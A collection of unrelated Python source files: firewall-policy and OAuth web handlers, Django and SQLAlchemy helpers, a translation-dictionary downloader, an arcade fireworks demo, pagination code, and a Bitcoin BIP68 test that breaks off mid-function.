kit.modify_policy("OUTPUT", self.input.output_policy)
kit.modify_policy("FORWARD",self.input.forward_policy)
kit.write_firewall_xml()
for chain in kit.basic_chains['filter']:
try:
policy = kit.firewall_xml['filter'][chain]['policy']
except:
policy = 'ACCEPT'
chain = chain.lower()
exec("self.view.%s_policy_ACCEPT_checked = ''" % chain)
exec("self.view.%s_policy_DROP_checked = ''" % chain)
exec("self.view.%s_policy_REJECT_checked = ''" % chain)
if policy == 'REJECT':
exec("self.view.%s_policy = 'REJECT'" % chain)
exec("self.view.%s_policy_REJECT_checked = 'checked'" % chain)
elif policy == 'DROP':
exec("self.view.%s_policy = 'DROP'" % chain)
exec("self.view.%s_policy_DROP_checked = 'checked'" % chain)
self.view.base_policy_DROP_checked = 'checked';
else:
exec("self.view.%s_policy = 'ACCEPT'" % chain)
exec("self.view.%s_policy_ACCEPT_checked = 'checked'" % chain)
return web.seeother(web.ctx.path)
urls = ('/host/(\d+)/firewall/policy/?(\.part)$', HostBy1FirewallPolicy,)
|
py | b40b541327d2328ab34edf894a64d7c5613d78fc | import pytz
import datetime
from django.utils.dateparse import parse_datetime
def utc_now():
return datetime.datetime.utcnow().replace(tzinfo=pytz.utc)
def get_valid_period(start_time=None, end_time=None):
"""
Extract a valid period.
If start_time and end_time are provided and no more than a day apart, return them.
If neither start_time nor end_time are given, return the previous 24 hour period, calculated from now.
If start_time is given, return 24 hour period starting from start time.
If end_time is given, return 24 hour period ending at end_time.
:param start_time:
:param end_time:
:return:
"""
if start_time and end_time:
if end_time <= start_time:
raise ValueError("end_time must be after start_time")
# Allow 1 day and 1 hour to not bother with more complicated logic for daylight savings time edge cases:
if start_time + datetime.timedelta(days=1, hours=1) < end_time:
raise ValueError("Difference between start_time and end_time must not be greater than one day")
return start_time, end_time
if start_time is None and end_time is None:
end_time = utc_now()
day = datetime.timedelta(days=1)
if start_time:
return start_time, start_time + day
else:
return end_time - day, end_time
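# Illustrative calls (assuming timezone-aware datetimes, as produced by
# utc_now()):
#
#   start = datetime.datetime(2020, 1, 1, tzinfo=pytz.utc)
#   get_valid_period(start_time=start)
#   # -> (2020-01-01 00:00 UTC, 2020-01-02 00:00 UTC)
#   get_valid_period()   # -> the previous 24 hours, ending now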
|
py | b40b55a578c8d1cda44024c7784b11d5b5817e20 | from tartiflette_middleware import BaseMiddleware
class SQLAlchemySessionMiddleware(BaseMiddleware):
label = 'SA'
def __init__(self, *, db_manager):
BaseMiddleware.__init__(self)
self.db_manager = db_manager
async def __aenter__(self):
session = self.db_manager.get_scoped_session()
await self.store_request_data(session)
return self
async def __aexit__(self, exc_type, exc_val, exc_tb):
session = await self.get_request_data()
session.remove()
|
py | b40b5749b4b8c6bb63240829b7763cf32b820428 | import json
import pprint
import logging
import requests
from django.conf import settings
from django.template import loader
from django.http import HttpResponse
from rest_framework import status
from django.contrib import messages
from django.shortcuts import redirect
from rest_framework.response import Response
from django.contrib.auth.decorators import login_required
from webapp.celery import run_daily_summary
from zenslackchat.models import SlackApp
from zenslackchat.models import ZendeskApp
from zenslackchat.models import PagerDutyApp
def slack_oauth(request):
"""Complete the OAuth process recovering the details needed to access the
slack workspace we have just been added to.
"""
log = logging.getLogger(__name__)
if 'code' not in request.GET:
log.error("The code parameter was missing in the request!")
return Response(status=status.HTTP_400_BAD_REQUEST)
code = request.GET['code']
log.debug(f"Received Slack OAuth request code:<{code}>")
params = {
'code': code,
'client_id': settings.SLACK_CLIENT_ID,
'client_secret': settings.SLACK_CLIENT_SECRET
}
log.debug("Recovering access request from Slack...")
json_response = requests.get(settings.SLACK_OAUTH_URI, params)
log.debug(f"Result status from Slack:<{json_response.status_code}>")
if settings.DEBUG:
log.debug(f"Result from Slack:\n{json_response.text}")
data = json.loads(json_response.text)
SlackApp.objects.create(
team_name=data['team_name'],
team_id=data['team_id'],
bot_user_id=data['bot']['bot_user_id'],
bot_access_token=data['bot']['bot_access_token']
)
log.debug("Create local Team for this bot. Bot Added OK.")
return HttpResponse('Bot added to your Slack team!')
def zendesk_oauth(request):
"""Complete the Zendesk OAuth process recovering the access_token needed to
perform API requests to the Zendesk Support API.
"""
log = logging.getLogger(__name__)
if 'code' not in request.GET:
log.error("The code parameter was missing in the request!")
return Response(status=status.HTTP_400_BAD_REQUEST)
subdomain = settings.ZENDESK_SUBDOMAIN
request_url = f"https://{subdomain}.zendesk.com/oauth/tokens"
redirect_uri = settings.ZENDESK_REDIRECT_URI
code = request.GET['code']
log.debug(
f"Received Zendesk OAuth request code:<{code}>. "
f"Recovering access token from {request_url}. "
f"Redirect URL is {redirect_uri}. "
)
data = {
'code': code,
'client_id': settings.ZENDESK_CLIENT_IDENTIFIER,
'client_secret': settings.ZENDESK_CLIENT_SECRET,
'grant_type': 'authorization_code',
'redirect_uri': redirect_uri,
}
response = requests.post(
request_url,
data=json.dumps(data),
headers={"Content-Type": "application/json"}
)
log.debug(f"Result status from Zendesk:<{response.status_code}>")
response.raise_for_status()
data = response.json()
log.debug(f"Result status from Zendesk:\n{pprint.pformat(data)}>")
ZendeskApp.objects.create(
access_token=data['access_token'],
token_type=data['token_type'],
scope=data['scope'],
)
log.debug("Created local ZendeskApp instance OK.")
return HttpResponse('ZendeskApp Added OK')
def pagerduty_oauth(request):
"""Complete the Pager Duty OAuth process.
- https://developer.pagerduty.com/docs/app-integration-development/
oauth-2-auth-code-grant/
"""
log = logging.getLogger(__name__)
if 'code' not in request.GET:
log.error("The code parameter was missing in the request!")
return Response(status=status.HTTP_400_BAD_REQUEST)
code = request.GET['code']
subdomain = request.GET['subdomain']
log.debug(
f"Received Zendesk OAuth request code:<{code}> for subdomain:"
f"<{subdomain}>. Recovering access token."
)
response = requests.post(
(
f'{settings.PAGERDUTY_OAUTH_URI}?'
'grant_type=authorization_code&'
f'client_id={settings.PAGERDUTY_CLIENT_IDENTIFIER}&'
f'client_secret={settings.PAGERDUTY_CLIENT_SECRET}&'
f'redirect_uri={settings.PAGERDUTY_REDIRECT_URI}&'
f'code={code}'
)
)
log.debug(f"Result status from PagerDuty:<{response.status_code}>")
response.raise_for_status()
data = response.json()
if settings.DEBUG:
log.debug(f"Result status from PagerDuty:\n{pprint.pformat(data)}>")
PagerDutyApp.objects.create(
access_token=data['access_token'],
token_type=data['token_type'],
scope=data['scope'],
)
log.debug("Created local PagerDutyApp instance OK.")
return HttpResponse('PagerDutyApp Added OK')
@login_required
def trigger_daily_report(request):
"""Helper to trigger the daily report to aid in testing it works.
Otherwise you would need to connect into the running instance and do it
from the django shell.
"""
log = logging.getLogger(__name__)
log.info("Scheduling the daily report to run now...")
run_daily_summary.delay()
msg = "Daily report scheduled."
log.info(msg)
messages.success(request, msg)
return redirect('/')
# Restrict scope down to what I can interact with..
ZENDESK_REQUESTED_SCOPES = "%20".join((
# general read:
'read',
# allows me to be zenslackchat when managing tickets
'impersonate',
# I only need access to tickets resources:
'tickets:read', 'tickets:write',
))
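# With the four scopes above this evaluates to the URL-encoded string
# "read%20impersonate%20tickets:read%20tickets:write".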
@login_required
def index(request):
"""A page Pingdom can log-in to test site uptime and DB readiness.
"""
log = logging.getLogger(__name__)
template = loader.get_template('zenslackchat/index.html')
zendesk_oauth_request_uri = (
"https://"
f"{settings.ZENDESK_SUBDOMAIN}"
".zendesk.com/oauth/authorizations/new?"
f"response_type=code&"
f"redirect_uri={settings.ZENDESK_REDIRECT_URI}&"
f"client_id={settings.ZENDESK_CLIENT_IDENTIFIER}&"
f"scope={ZENDESK_REQUESTED_SCOPES}"
)
log.debug(f"zendesk_oauth_request_uri:<{zendesk_oauth_request_uri}>")
slack_oauth_request_uri = (
"https://slack.com/oauth/authorize?"
"scope=bot&"
f"client_id={settings.SLACK_CLIENT_ID}"
)
log.debug(f"slack_oauth_request_uri:<{slack_oauth_request_uri}>")
pagerduty_oauth_request_uri = (
'https://app.pagerduty.com/oauth/authorize?'
f'client_id={settings.PAGERDUTY_CLIENT_IDENTIFIER}&'
f'redirect_uri={settings.PAGERDUTY_REDIRECT_URI}&'
'response_type=code'
)
log.debug(f"pagerduty_oauth_request_uri:<{pagerduty_oauth_request_uri}>")
return HttpResponse(template.render(
dict(
zendesk_oauth_request_uri=zendesk_oauth_request_uri,
slack_oauth_request_uri=slack_oauth_request_uri,
pagerduty_oauth_request_uri=pagerduty_oauth_request_uri
),
request
))
|
py | b40b57b2374c8cc2d913fb08a8b17ea11e662c03 | # -*- coding: utf-8 -*-
import platform
import wget
import requests
import os
import pickle
from zipfile import ZipFile
from os.path import expanduser
def get_savedir(savedir=None):
if savedir:
os.makedirs(savedir, exist_ok=True)
return savedir
pf = platform.system()
if pf == "Windows":
savedir = "C:\word2word"
else:
homedir = expanduser("~")
savedir = os.path.join(homedir, ".word2word")
    os.makedirs(savedir, exist_ok=True)
    return savedir
def exists(path):
r = requests.head(path)
return r.status_code == requests.codes.ok
def get_download_url(lang1, lang2):
filepath = os.path.dirname(os.path.abspath(__file__)) + '/supporting_languages.txt'
for line in open(filepath, 'r'):
l1, l2 = line.strip().split("-")
if lang1 == l1 and lang2 == l2:
return f"https://mk.kakaocdn.net/dn/kakaobrain/word2word/{lang1}-{lang2}.pkl"
raise Exception(f"Language pair {lang1}-{lang2} is not supported.")
def download_or_load(lang1, lang2, custom_savedir):
savedir = get_savedir(savedir=custom_savedir)
fpath = os.path.join(savedir, f"{lang1}-{lang2}.pkl")
if not os.path.exists(fpath):
# download from cloud
url = get_download_url(lang1, lang2)
if not exists(url):
raise ValueError("Sorry. There seems to be a problem with cloud access.")
print("Downloading data ...")
wget.download(url, fpath)
word2x, y2word, x2ys = pickle.load(open(fpath, 'rb'))
return word2x, y2word, x2ys
def download_os2018(lang1, lang2):
"""Download corpora from OpenSubtitles2018.
:return (lang1_file, lang2_file)
"""
datadir = "data"
filepref = f"OpenSubtitles.{lang1}-{lang2}"
if all(os.path.exists(os.path.join(datadir, f"{filepref}.{lang}"))
for lang in [lang1, lang2]):
print(f"Found existing {filepref} files. loading...")
else:
# Download and unzip parallel corpus
url = f"http://opus.nlpl.eu/download.php?f=OpenSubtitles/v2018/moses/{lang1}-{lang2}.txt.zip"
zipname = os.path.join(datadir, f"{lang1}-{lang2}.txt.zip")
print(f"Downloading {filepref}...")
wget.download(url, zipname)
with ZipFile(zipname) as zf:
for fname in zf.namelist():
if fname.startswith(filepref):
zf.extract(fname, datadir)
os.remove(zipname)
lang1_file, lang2_file = [
os.path.abspath(os.path.join(datadir, f"{filepref}.{lang}"))
for lang in [lang1, lang2]
]
return lang1_file, lang2_file
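# A minimal usage sketch (the first call downloads, later calls hit the cache):
#
#   word2x, y2word, x2ys = download_or_load("en", "fr", custom_savedir=None)
#   en_file, fr_file = download_os2018("en", "fr")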
|
py | b40b57bd1b70238f28cf4c6cd58265775b52e0c0 | """
Particle Fireworks
Use a fireworks display to demonstrate "real-world" uses of Emitters and Particles
If Python and Arcade are installed, this example can be run from the command line with:
python -m arcade.examples.sprite_list_particle_fireworks
"""
import arcade
from arcade import Point, Vector
from arcade.utils import _Vec2 # bring in "private" class
from arcade.examples.frametime_plotter import FrametimePlotter
import os
import random
import pyglet
SCREEN_WIDTH = 800
SCREEN_HEIGHT = 600
SCREEN_TITLE = "Particle based fireworks"
LAUNCH_INTERVAL_MIN = 1.5
LAUNCH_INTERVAL_MAX = 2.5
TEXTURE = "images/pool_cue_ball.png"
RAINBOW_COLORS = (
arcade.color.ELECTRIC_CRIMSON,
arcade.color.FLUORESCENT_ORANGE,
arcade.color.ELECTRIC_YELLOW,
arcade.color.ELECTRIC_GREEN,
arcade.color.ELECTRIC_CYAN,
arcade.color.MEDIUM_ELECTRIC_BLUE,
arcade.color.ELECTRIC_INDIGO,
arcade.color.ELECTRIC_PURPLE,
)
SPARK_TEXTURES = [arcade.make_circle_texture(15, clr) for clr in RAINBOW_COLORS]
SPARK_PAIRS = [
[SPARK_TEXTURES[0], SPARK_TEXTURES[3]],
[SPARK_TEXTURES[1], SPARK_TEXTURES[5]],
[SPARK_TEXTURES[7], SPARK_TEXTURES[2]],
]
ROCKET_SMOKE_TEXTURE = arcade.make_soft_circle_texture(15, arcade.color.GRAY)
PUFF_TEXTURE = arcade.make_soft_circle_texture(80, (40, 40, 40))
FLASH_TEXTURE = arcade.make_soft_circle_texture(70, (128, 128, 90))
CLOUD_TEXTURES = [
arcade.make_soft_circle_texture(50, arcade.color.WHITE),
arcade.make_soft_circle_texture(50, arcade.color.LIGHT_GRAY),
arcade.make_soft_circle_texture(50, arcade.color.LIGHT_BLUE),
]
STAR_TEXTURES = [
arcade.make_soft_circle_texture(6, arcade.color.WHITE),
arcade.make_soft_circle_texture(6, arcade.color.PASTEL_YELLOW),
]
SPINNER_HEIGHT=75
def make_spinner():
spinner = arcade.Emitter(
center_xy=(SCREEN_WIDTH / 2, SPINNER_HEIGHT - 5),
emit_controller=arcade.EmitterIntervalWithTime(0.025, 2.0),
particle_factory=lambda emitter: arcade.FadeParticle(
filename_or_texture=random.choice(STAR_TEXTURES),
change_xy=(0, 6.0),
lifetime=0.2
)
)
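    # change_angle is added to the emitter's angle on every update, so this
    # spins the spark fountain a fixed number of degrees per frame.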
spinner.change_angle = 16.28
return spinner
def make_rocket(emit_done_cb):
"""Emitter that displays the smoke trail as the firework shell climbs into the sky"""
rocket = RocketEmitter(
center_xy=(random.uniform(100, SCREEN_WIDTH - 100), 25),
emit_controller=arcade.EmitterIntervalWithTime(0.04, 2.0),
particle_factory=lambda emitter: arcade.FadeParticle(
filename_or_texture=ROCKET_SMOKE_TEXTURE,
change_xy=arcade.rand_in_circle((0.0, 0.0), 0.08),
scale=0.5,
lifetime=random.uniform(1.0, 1.5),
start_alpha=100,
end_alpha=0,
mutation_callback=rocket_smoke_mutator
),
emit_done_cb=emit_done_cb
)
rocket.change_x = random.uniform(-1.0, 1.0)
rocket.change_y = random.uniform(5.0, 7.25)
return rocket
def make_flash(prev_emitter):
"""Return emitter that displays the brief flash when a firework shell explodes"""
return arcade.Emitter(
center_xy=prev_emitter.get_pos(),
emit_controller=arcade.EmitBurst(3),
particle_factory=lambda emitter: arcade.FadeParticle(
filename_or_texture=FLASH_TEXTURE,
change_xy=arcade.rand_in_circle((0.0, 0.0), 3.5),
lifetime=0.15
)
)
def make_puff(prev_emitter):
"""Return emitter that generates the subtle smoke cloud left after a firework shell explodes"""
return arcade.Emitter(
center_xy=prev_emitter.get_pos(),
emit_controller=arcade.EmitBurst(4),
particle_factory=lambda emitter: arcade.FadeParticle(
filename_or_texture=PUFF_TEXTURE,
change_xy=(_Vec2(arcade.rand_in_circle((0.0, 0.0), 0.4)) + _Vec2(0.3, 0.0)).as_tuple(),
lifetime=4.0
)
)
class AnimatedAlphaParticle(arcade.LifetimeParticle):
"""A custom particle that animates between three different alpha levels"""
def __init__(
self,
filename_or_texture: arcade.FilenameOrTexture,
change_xy: Vector,
start_alpha: int = 0,
duration1: float = 1.0,
mid_alpha: int = 255,
duration2: float = 1.0,
end_alpha: int = 0,
center_xy: Point = (0.0, 0.0),
angle: float = 0,
change_angle: float = 0,
scale: float = 1.0,
mutation_callback=None,
):
super().__init__(filename_or_texture, change_xy, duration1 + duration2, center_xy, angle, change_angle, scale, start_alpha, mutation_callback)
self.start_alpha = start_alpha
self.in_duration = duration1
self.mid_alpha = mid_alpha
self.out_duration = duration2
self.end_alpha = end_alpha
def update(self):
super().update()
if self.lifetime_elapsed <= self.in_duration:
u = self.lifetime_elapsed / self.in_duration
self.alpha = arcade.lerp(self.start_alpha, self.mid_alpha, u)
else:
u = (self.lifetime_elapsed - self.in_duration) / self.out_duration
self.alpha = arcade.lerp(self.mid_alpha, self.end_alpha, u)
class RocketEmitter(arcade.Emitter):
"""Custom emitter class to add gravity to the emitter to represent gravity on the firework shell"""
def update(self):
super().update()
# gravity
self.change_y += -0.05
class FireworksApp(arcade.Window):
def __init__(self):
super().__init__(SCREEN_WIDTH, SCREEN_HEIGHT, SCREEN_TITLE)
# Set the working directory (where we expect to find files) to the same
# directory this .py file is in. You can leave this out of your own
# code, but it is needed to easily run the examples using "python -m"
# as mentioned at the top of this program.
file_path = os.path.dirname(os.path.abspath(__file__))
os.chdir(file_path)
arcade.set_background_color(arcade.color.BLACK)
self.emitters = []
self.frametime_plotter = FrametimePlotter()
self.launch_firework(0)
arcade.schedule(self.launch_spinner, 4.0)
stars = arcade.Emitter(
center_xy=(0.0, 0.0),
emit_controller=arcade.EmitMaintainCount(20),
particle_factory=lambda emitter: AnimatedAlphaParticle(
filename_or_texture=random.choice(STAR_TEXTURES),
change_xy=(0.0, 0.0),
start_alpha=0,
duration1=random.uniform(2.0, 6.0),
mid_alpha=128,
duration2=random.uniform(2.0, 6.0),
end_alpha=0,
center_xy=arcade.rand_in_rect((0.0, 0.0), SCREEN_WIDTH, SCREEN_HEIGHT)
)
)
self.emitters.append(stars)
self.cloud = arcade.Emitter(
center_xy=(50, 500),
change_xy=(0.15, 0),
emit_controller=arcade.EmitMaintainCount(60),
particle_factory=lambda emitter: AnimatedAlphaParticle(
filename_or_texture=random.choice(CLOUD_TEXTURES),
change_xy=(_Vec2(arcade.rand_in_circle((0.0, 0.0), 0.04)) + _Vec2(0.1, 0)).as_tuple(),
start_alpha=0,
duration1=random.uniform(5.0, 10.0),
mid_alpha=255,
duration2=random.uniform(5.0, 10.0),
end_alpha=0,
center_xy=arcade.rand_in_circle((0.0, 0.0), 50)
)
)
self.emitters.append(self.cloud)
def launch_firework(self, delta_time):
self.frametime_plotter.add_event("launch")
launchers = (
self.launch_random_firework,
self.launch_ringed_firework,
self.launch_sparkle_firework,
)
random.choice(launchers)(delta_time)
pyglet.clock.schedule_once(self.launch_firework, random.uniform(LAUNCH_INTERVAL_MIN, LAUNCH_INTERVAL_MAX))
def launch_random_firework(self, delta_time):
"""Simple firework that explodes in a random color"""
rocket = make_rocket(self.explode_firework)
self.emitters.append(rocket)
def launch_ringed_firework(self, delta_time):
""""Firework that has a basic explosion and a ring of sparks of a different color"""
rocket = make_rocket(self.explode_ringed_firework)
self.emitters.append(rocket)
def launch_sparkle_firework(self, delta_time):
"""Firework which has sparks that sparkle"""
rocket = make_rocket(self.explode_sparkle_firework)
self.emitters.append(rocket)
def launch_spinner(self, delta_time):
"""Start the spinner that throws sparks"""
spinner1 = make_spinner()
spinner2 = make_spinner()
spinner2.angle = 180
self.emitters.append(spinner1)
self.emitters.append(spinner2)
def explode_firework(self, prev_emitter):
"""Actions that happen when a firework shell explodes, resulting in a typical firework"""
self.emitters.append(make_puff(prev_emitter))
self.emitters.append(make_flash(prev_emitter))
spark_texture = random.choice(SPARK_TEXTURES)
sparks = arcade.Emitter(
center_xy=prev_emitter.get_pos(),
emit_controller=arcade.EmitBurst(random.randint(30, 40)),
particle_factory=lambda emitter: arcade.FadeParticle(
filename_or_texture=spark_texture,
change_xy=arcade.rand_in_circle((0.0, 0.0), 9.0),
lifetime=random.uniform(0.5, 1.2),
mutation_callback=firework_spark_mutator
)
)
self.emitters.append(sparks)
def explode_ringed_firework(self, prev_emitter):
"""Actions that happen when a firework shell explodes, resulting in a ringed firework"""
self.emitters.append(make_puff(prev_emitter))
self.emitters.append(make_flash(prev_emitter))
spark_texture, ring_texture = random.choice(SPARK_PAIRS)
sparks = arcade.Emitter(
center_xy=prev_emitter.get_pos(),
emit_controller=arcade.EmitBurst(25),
particle_factory=lambda emitter: arcade.FadeParticle(
filename_or_texture=spark_texture,
change_xy=arcade.rand_in_circle((0.0, 0.0), 8.0),
lifetime=random.uniform(0.55, 0.8),
mutation_callback=firework_spark_mutator
)
)
self.emitters.append(sparks)
ring = arcade.Emitter(
center_xy=prev_emitter.get_pos(),
emit_controller=arcade.EmitBurst(20),
particle_factory=lambda emitter: arcade.FadeParticle(
filename_or_texture=ring_texture,
change_xy=arcade.rand_on_circle((0.0, 0.0), 5.0) + arcade.rand_in_circle((0.0, 0.0), 0.25),
lifetime=random.uniform(1.0, 1.6),
mutation_callback=firework_spark_mutator
)
)
self.emitters.append(ring)
def explode_sparkle_firework(self, prev_emitter):
"""Actions that happen when a firework shell explodes, resulting in a sparkling firework"""
self.emitters.append(make_puff(prev_emitter))
self.emitters.append(make_flash(prev_emitter))
spark_texture = random.choice(SPARK_TEXTURES)
sparks = arcade.Emitter(
center_xy=prev_emitter.get_pos(),
emit_controller=arcade.EmitBurst(random.randint(30, 40)),
particle_factory=lambda emitter: AnimatedAlphaParticle(
filename_or_texture=spark_texture,
change_xy=arcade.rand_in_circle((0.0, 0.0), 9.0),
start_alpha=255,
duration1=random.uniform(0.6, 1.0),
mid_alpha=0,
duration2=random.uniform(0.1, 0.2),
end_alpha=255,
mutation_callback=firework_spark_mutator
)
)
self.emitters.append(sparks)
def update(self, delta_time):
# prevent list from being mutated (often by callbacks) while iterating over it
emitters_to_update = self.emitters.copy()
# update cloud
if self.cloud.center_x > SCREEN_WIDTH:
self.cloud.center_x = 0
# update
for e in emitters_to_update:
e.update()
# remove emitters that can be reaped
to_del = [e for e in emitters_to_update if e.can_reap()]
for e in to_del:
self.emitters.remove(e)
self.frametime_plotter.end_frame(delta_time)
def on_draw(self):
arcade.start_render()
for e in self.emitters:
e.draw()
arcade.draw_lrtb_rectangle_filled(0, SCREEN_WIDTH, 25, 0, arcade.color.DARK_GREEN)
mid = SCREEN_WIDTH / 2
arcade.draw_lrtb_rectangle_filled(mid-2, mid+2, SPINNER_HEIGHT, 10, arcade.color.DARK_BROWN)
def on_key_press(self, key, modifiers):
if key == arcade.key.ESCAPE:
arcade.close_window()
def firework_spark_mutator(emitter: arcade.Emitter):
"""mutation_callback shared by all fireworks sparks"""
# gravity
emitter.change_y += -0.03
# drag
emitter.change_x *= 0.92
emitter.change_y *= 0.92
def rocket_smoke_mutator(emitter: arcade.Emitter):
emitter.scale = arcade.lerp(0.5, 3.0, emitter.lifetime_elapsed/emitter.lifetime_original)
# A Sprite's scale doesn't affect generated textures (ex: make_soft_circle_texture) or scale being animated over time.
# The fix below is copied from Sprite.update_animation().
# Bug may have been recorded here: https://github.com/pvcraven/arcade/issues/331
emitter.width = emitter._texture.width * emitter.scale
emitter.height = emitter._texture.height * emitter.scale
if __name__ == "__main__":
app = FireworksApp()
arcade.run()
app.frametime_plotter.show()
|
py | b40b57e9a4b3e9b45c191b0e0c556482073145f4 | from urllib.parse import urljoin
from django.contrib.auth.forms import PasswordResetForm
from rest_auth.serializers import PasswordResetSerializer
from rssant_common.standby_domain import get_request_root_url
from .settings import DEFAULT_FROM_EMAIL
from .email_template import RESET_PASSWORD_TEMPLATE
class RssantPasswordResetForm(PasswordResetForm):
def __init__(self, *args, **kwargs):
self._request = None
super().__init__(*args, **kwargs)
def get_from_email(self):
"""
        This is a hook that can be overridden to programmatically
set the 'from' email address for sending emails
"""
return DEFAULT_FROM_EMAIL
def send_mail(self, subject_template_name, email_template_name,
context, from_email, to_email, html_email_template_name=None):
link = 'reset-password/{}?token={}'.format(context['uid'], context['token'])
root_url = get_request_root_url(self._request)
link = urljoin(root_url, link)
my_context = dict(rssant_url=root_url, email=to_email, link=link)
RESET_PASSWORD_TEMPLATE.send(self.get_from_email(), to_email, my_context)
def save(self, *args, **kwargs):
self._request = kwargs.get('request')
super().save(*args, **kwargs)
class RssantPasswordResetSerializer(PasswordResetSerializer):
password_reset_form_class = RssantPasswordResetForm
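# A minimal wiring sketch (assumed settings.py, following rest_auth's
# serializer-override convention):
#
#   REST_AUTH_SERIALIZERS = {
#       'PASSWORD_RESET_SERIALIZER':
#           'path.to.RssantPasswordResetSerializer',
#   }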
|
py | b40b5a6316ceabcf5296d1fc59b860aa984bb8be | from collections import OrderedDict
from django.utils.translation import ugettext_lazy as _
from rest_framework.pagination import PageNumberPagination
from rest_framework.response import Response
from rest_framework.utils.urls import remove_query_param, replace_query_param
class PaginationPermissionsMixin(object):
"""
Interface for listing permissions in a paginated response.
"""
    def __init__(self, *args, **kwargs):
        self.permissions = None
        super(PaginationPermissionsMixin, self).__init__(*args, **kwargs)
def set_permissions(self, permissions):
self.permissions = permissions
class LinksPageNumberPagination(PaginationPermissionsMixin, PageNumberPagination):
"""
    Decorates the page number pagination with _links for navigation and
extra properties like total page count, result count, etc.
"""
# Page size parameter configuration.
page_size_query_param = 'limit'
# Page size configuration.
page_size = 100
max_page_size = 500
def __init__(self):
super(LinksPageNumberPagination, self).__init__()
self.links = []
def add_link(self, link):
self.links.append(link)
def get_paginated_response(self, data):
content = [
('_links', OrderedDict([
('first', self.get_first_link()),
('last', self.get_last_link()),
('next', self.get_next_link()),
('previous', self.get_previous_link()),
] + self.links))
]
if self.permissions:
content.append(('_permissions', self.permissions))
content.append(('count', self.page.paginator.count))
content.append(('pages', self.page.paginator.num_pages))
content.append(('current_page', self.page.number))
content.append(('per_page', self.page.paginator.per_page))
content.append(('results', data))
return Response(OrderedDict(content))
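    # The rendered payload looks roughly like (illustrative values):
    #   {"_links": {"first": ..., "last": ..., "next": ..., "previous": ...},
    #    "count": 250, "pages": 3, "current_page": 1, "per_page": 100,
    #    "results": [...]}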
def get_first_link(self):
url = self.request.build_absolute_uri()
return remove_query_param(url, self.page_query_param)
def get_last_link(self):
page_count = self.page.paginator.num_pages
if not page_count > 1:
return self.get_first_link()
url = self.request.build_absolute_uri()
return replace_query_param(url, self.page_query_param, page_count)
def paginate_queryset(self, queryset, request, view=None):
# Skip pagination when csv export is requested
if request.GET.get('format', '') == 'csv':
return None
return super(LinksPageNumberPagination, self).paginate_queryset(queryset, request, view) |
py | b40b5a848a29693c8cd4f8f83102c519353ecd2b | #!/usr/bin/env python3
# Copyright (c) 2014-2018 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test BIP68 implementation."""
import random
import time
from test_framework.blocktools import create_block, create_coinbase, add_witness_commitment
from test_framework.messages import COIN, COutPoint, CTransaction, CTxIn, CTxOut, FromHex, ToHex
from test_framework.script import CScript
from test_framework.test_framework import BitcoinrandTestFramework
from test_framework.util import assert_equal, assert_greater_than, assert_raises_rpc_error, bytes_to_hex_str, get_bip9_status, satoshi_round, sync_blocks
SEQUENCE_LOCKTIME_DISABLE_FLAG = (1<<31)
SEQUENCE_LOCKTIME_TYPE_FLAG = (1<<22) # this means use time (0 means height)
SEQUENCE_LOCKTIME_GRANULARITY = 9 # this is a bit-shift
SEQUENCE_LOCKTIME_MASK = 0x0000ffff
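# Example encodings (illustrative): nSequence=10 is a relative lock of ten
# blocks, while SEQUENCE_LOCKTIME_TYPE_FLAG | 10 is a relative lock of
# 10 * 512 seconds (2**SEQUENCE_LOCKTIME_GRANULARITY) of median time past.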
# RPC error for non-BIP68 final transactions
NOT_FINAL_ERROR = "non-BIP68-final (code 64)"
class BIP68Test(BitcoinrandTestFramework):
def set_test_params(self):
self.num_nodes = 2
self.extra_args = [[], ["-acceptnonstdtxn=0"]]
def skip_test_if_missing_module(self):
self.skip_if_no_wallet()
def run_test(self):
self.relayfee = self.nodes[0].getnetworkinfo()["relayfee"]
# Generate some coins
self.nodes[0].generate(110)
self.log.info("Running test disable flag")
self.test_disable_flag()
self.log.info("Running test sequence-lock-confirmed-inputs")
self.test_sequence_lock_confirmed_inputs()
self.log.info("Running test sequence-lock-unconfirmed-inputs")
self.test_sequence_lock_unconfirmed_inputs()
self.log.info("Running test BIP68 not consensus before versionbits activation")
self.test_bip68_not_consensus()
self.log.info("Activating BIP68 (and 112/113)")
self.activateCSV()
self.log.info("Verifying nVersion=2 transactions are standard.")
self.log.info("Note that nVersion=2 transactions are always standard (independent of BIP68 activation status).")
self.test_version2_relay()
self.log.info("Passed")
# Test that BIP68 is not in effect if tx version is 1, or if
# the first sequence bit is set.
def test_disable_flag(self):
# Create some unconfirmed inputs
new_addr = self.nodes[0].getnewaddress()
self.nodes[0].sendtoaddress(new_addr, 2) # send 2 BZAR
utxos = self.nodes[0].listunspent(0, 0)
assert(len(utxos) > 0)
utxo = utxos[0]
tx1 = CTransaction()
value = int(satoshi_round(utxo["amount"] - self.relayfee)*COIN)
# Check that the disable flag disables relative locktime.
# If sequence locks were used, this would require 1 block for the
# input to mature.
sequence_value = SEQUENCE_LOCKTIME_DISABLE_FLAG | 1
tx1.vin = [CTxIn(COutPoint(int(utxo["txid"], 16), utxo["vout"]), nSequence=sequence_value)]
tx1.vout = [CTxOut(value, CScript([b'a']))]
tx1_signed = self.nodes[0].signrawtransactionwithwallet(ToHex(tx1))["hex"]
tx1_id = self.nodes[0].sendrawtransaction(tx1_signed)
tx1_id = int(tx1_id, 16)
# This transaction will enable sequence-locks, so this transaction should
# fail
tx2 = CTransaction()
tx2.nVersion = 2
sequence_value = sequence_value & 0x7fffffff
tx2.vin = [CTxIn(COutPoint(tx1_id, 0), nSequence=sequence_value)]
tx2.vout = [CTxOut(int(value - self.relayfee * COIN), CScript([b'a' * 35]))]
tx2.rehash()
assert_raises_rpc_error(-26, NOT_FINAL_ERROR, self.nodes[0].sendrawtransaction, ToHex(tx2))
# Setting the version back down to 1 should disable the sequence lock,
# so this should be accepted.
tx2.nVersion = 1
self.nodes[0].sendrawtransaction(ToHex(tx2))
# Calculate the median time past of a prior block ("confirmations" before
# the current tip).
def get_median_time_past(self, confirmations):
block_hash = self.nodes[0].getblockhash(self.nodes[0].getblockcount()-confirmations)
return self.nodes[0].getblockheader(block_hash)["mediantime"]
# Test that sequence locks are respected for transactions spending confirmed inputs.
def test_sequence_lock_confirmed_inputs(self):
# Create lots of confirmed utxos, and use them to generate lots of random
# transactions.
max_outputs = 50
addresses = []
while len(addresses) < max_outputs:
addresses.append(self.nodes[0].getnewaddress())
while len(self.nodes[0].listunspent()) < 200:
random.shuffle(addresses)
num_outputs = random.randint(1, max_outputs)
outputs = {}
for i in range(num_outputs):
